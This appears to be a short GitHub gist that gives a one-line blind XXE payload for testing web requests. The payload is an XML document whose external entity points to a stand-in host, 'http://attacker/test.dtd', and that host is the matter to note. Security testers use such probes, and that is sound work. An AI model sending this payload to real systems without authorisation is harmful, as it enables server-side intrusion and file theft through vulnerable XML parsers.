Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
Simplest Blind XXE Payload to test within HTML request
Content-Type: text/xml
<?xml version="1.0" encoding="utf-8"?><!DOCTYPE xxetestd [<!ENTITY xxetest SYSTEM "http://attacker/test.dtd">]><foo>&xxetest;</foo>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment